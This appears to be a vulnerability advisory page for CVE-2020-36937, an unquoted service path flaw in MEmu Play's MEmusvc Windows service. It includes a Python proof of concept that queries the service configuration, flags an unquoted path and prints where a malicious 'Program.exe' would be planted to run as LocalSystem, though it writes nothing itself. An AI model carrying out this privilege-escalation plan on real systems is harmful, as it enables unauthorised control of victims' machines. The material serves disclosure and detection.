Security Vulnerability Report
CVE-2020-36937 CVSS 7.8 HIGH

CVE-2020-36937

Published: 2026-01-25 14:15:48
Last Modified: 2026-04-15 00:35:42

Description

Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microvirt MEMU Play 3.7.0 (and possibly earlier versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
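# CVE-2020-36937 PoC - MEmusvc Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in MEmusvc
# Target: Microvirt MEMU Play 3.7.0 MEmusvc Windows Service
#
# What this listing actually does: it runs `sc qc` for the service, inspects
# the reported binary path, and prints messages. It writes no file and does
# not touch the service.
#
# Remediation for this weakness class (CWE-428): wrap the service's binary
# path in double quotes and make sure non-administrative users cannot create
# files in the directories leading to it.
import os
import re
import shutil  # unused below; kept from the original listing
import subprocess
import sys  # unused below; kept from the original listing

# Configuration
MALICIOUS_EXE_NAME = "Program.exe"  # Malicious executable name based on path structure
SERVICE_NAME = "MEmusvc"
# NOTE(review): the page does not show the service's real binary path, so it is
# not confirmed that this directory is a location Windows would consult for it.
MALICIOUS_DIR = r"C:\Program Files\Microvirt\MEMU"  # Path where to place malicious exe

# Executable portion of an unquoted command line: everything up to the first
# ".exe" that is followed by whitespace or the end of the string.
_EXE_PORTION = re.compile(r"^(.*?\.exe)(?=\s|$)", re.IGNORECASE)


def is_unquoted_service_path(binary_path):
    """Return True when *binary_path* is unquoted and its executable path has a space.

    Only the executable portion is examined, so an unquoted path without
    spaces that is followed by arguments (``svc.exe -k group``) is not
    reported, and a quote that belongs to an argument does not hide an
    unquoted executable path. This is a heuristic: when no ``.exe`` is found
    the whole string is treated as the executable path.

    Args:
        binary_path: The value reported for BINARY_PATH_NAME.

    Returns:
        True if the path should be flagged, False otherwise (including for
        an empty string).
    """
    candidate = binary_path.strip()
    if not candidate or candidate.startswith('"'):
        return False
    found = _EXE_PORTION.match(candidate)
    executable = found.group(1) if found else candidate
    return " " in executable


def check_vulnerability():
    """Report whether SERVICE_NAME is configured with an unquoted binary path.

    Runs ``sc qc SERVICE_NAME`` and inspects the first BINARY_PATH_NAME line.

    Returns:
        True when the path is flagged by is_unquoted_service_path(); False
        when it is not, when the service is not found, or when ``sc`` cannot
        be run.
    """
    try:
        # Query service configuration using sc command
        result = subprocess.run(
            ["sc", "qc", SERVICE_NAME],
            capture_output=True,
            text=True,
        )
    except (OSError, ValueError) as e:
        # OSError: `sc` is missing or not runnable; ValueError covers output
        # that cannot be decoded as text.
        print(f"[-] Error checking service: {e}")
        return False

    if result.returncode != 0 or "BINARY_PATH_NAME" not in result.stdout:
        print(f"[-] Service '{SERVICE_NAME}' not found")
        return False

    for line in result.stdout.splitlines():
        if "BINARY_PATH_NAME" not in line:
            continue
        print(f"[+] Service found. Path: {line}")
        # Everything after the first colon is the configured command line.
        path = line.split(":", 1)[1] if ":" in line else line
        if is_unquoted_service_path(path):
            # An unquoted path is a finding to fix in its own right; whether
            # it is reachable also depends on directory permissions, which
            # this function does not examine.
            print("[+] VULNERABLE: Service path is unquoted!")
            return True
        print("[-] NOT VULNERABLE: Service path is quoted or has no space in the executable path")
        return False
    return False


def create_malicious_exe(output_path):
    """Print where a payload would go; this placeholder creates nothing.

    Args:
        output_path: Path that is only echoed in the status message.

    Returns:
        Always True.
    """
    print(f"[*] Creating malicious executable at: {output_path}")
    print("[!] In real attack, this would be a compiled executable")
    print("[!] The executable would run with LocalSystem privileges")
    return True


def exploit():
    """Run the demonstration: check the service, then print the would-be steps.

    Returns:
        True when the service is flagged and MALICIOUS_DIR passes the
        os.access() check; False otherwise.
    """
    print("=" * 60)
    print("CVE-2020-36937 - MEmusvc Unquoted Service Path Exploit")
    print("=" * 60)

    # Step 1: Check if vulnerable
    if not check_vulnerability():
        print("\n[-] Exploitation aborted - target not vulnerable")
        return False

    # Step 2: Build the path that the messages below refer to
    malicious_path = os.path.join(MALICIOUS_DIR, MALICIOUS_EXE_NAME)

    # NOTE(review): on Windows, os.access() is believed to look at file
    # attributes rather than the directory's ACL, so passing this check is
    # not evidence that a low-privileged user can write here. Audit the
    # effective permissions with icacls or Get-Acl instead. TODO confirm.
    if not os.access(MALICIOUS_DIR, os.W_OK):
        print(f"[-] No write permission to {MALICIOUS_DIR}")
        print("[-] This exploit requires low-privilege code execution")
        return False

    # Step 3: Placeholder only; nothing is written
    if create_malicious_exe(malicious_path):
        print(f"[+] Malicious executable would be placed at: {malicious_path}")
        print("[+] On next service restart, the malicious code will execute")
        # Backslash escaped: "\S" is an invalid escape sequence in a normal string.
        print("[+] Code will run with LocalSystem (NT AUTHORITY\\SYSTEM) privileges")
        return True
    return False


if __name__ == "__main__":
    print("\n[*] This is a demonstration of CVE-2020-36937")
    print("[*] For authorized security testing only\n")
    exploit()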

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2020-36937", "sourceIdentifier": "[email protected]", "published": "2026-01-25T14:15:48.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges."}, {"lang": "es", "value": "Microvirt MEMU Play 3.7.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows MEmusvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se ejecutarán con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", 
"modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49016", "source": "[email protected]"}, {"url": "https://www.memuplay.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/memu-play-memusvc-unquoted-service-path", "source": "[email protected]"}]}}